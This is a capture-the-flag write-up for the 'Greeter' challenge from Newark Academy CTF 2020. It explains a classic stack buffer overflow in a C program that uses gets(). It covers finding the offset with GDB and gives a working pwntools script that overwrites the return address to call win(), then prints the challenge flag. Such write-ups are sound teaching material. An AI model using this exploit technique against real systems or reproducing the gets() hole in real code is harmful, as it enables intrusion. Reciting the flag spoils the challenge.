## Greeter

* **CTF:** Newark Academy CTF 2020
* **Category:** Binary exploitation 
* **Points:** 150
* **Author(s):** b0uldrr
* **Date:** 31/10/20

---

### Challenge
```
I'm really not sure who thought this thing was necessary, but here's a person-greeter-as-a-service!

nc challenges.ctfd.io 30249

-asphyxia

```
---

### Downloads
* [greeter](greeter)
* [greeter.c](greeter.c)

---

### Solution

Generic CTF buffer overflow problem. We need to overwrite the return address with the address of the `win()` function. Here's the provided source:

```c
#include <stdio.h>
#include <stdlib.h>

void win() {
        puts("congrats! here's your flag:");
        char flagbuf[64];
        FILE* f = fopen("./flag.txt", "r");
        if (f == NULL) {
                puts("flag file not found!");
                exit(1);
        }
        fgets(flagbuf, 64, f);
        fputs(flagbuf, stdout);
        fclose(f);
}

int main() {
        /* disable stream buffering */
        setvbuf(stdin,  NULL, _IONBF, 0);
        setvbuf(stdout, NULL, _IONBF, 0);
        setvbuf(stderr, NULL, _IONBF, 0);

        char name[64];

        puts("What's your name?");
        gets(name);
        printf("Why hello there %s!\n", name);

        return 0;
```

My solution:
1. Find the overflow offset to the return address using GDB-Peda
	1. `pattern create 200 pattern.txt`
	1. `run < pattern.txt`
	1. `x $rsp` -> 0x65414149
	1. `pattern_offset 0x6541419` -> offset found at 72
1. Find the address of `win()`: `objdump -d greeter | grep win` -> 0x0000000000401220
1. Plug those values into my script:

```python
#!/usr/bin/python3
import pwn

local = False
if local:
    conn = pwn.process('./greeter')
else:
    conn = pwn.remote('challenges.ctfd.io', 30249)
    
conn.recvuntil('name?')

buf  = b'a' * 72                     # overflow with junk up to and including the base pointer
buf += pwn.p64(0x0000000000401220)   # write the address of win() over the return instruction address on the stack

conn.sendline(buf)
print(conn.recvall().decode())
```

![flag](images/flag.png)

---

### Flag 
```
nactf{n4v4r_us3_g3ts_5vlrDKJufaUOd8Ur}
```
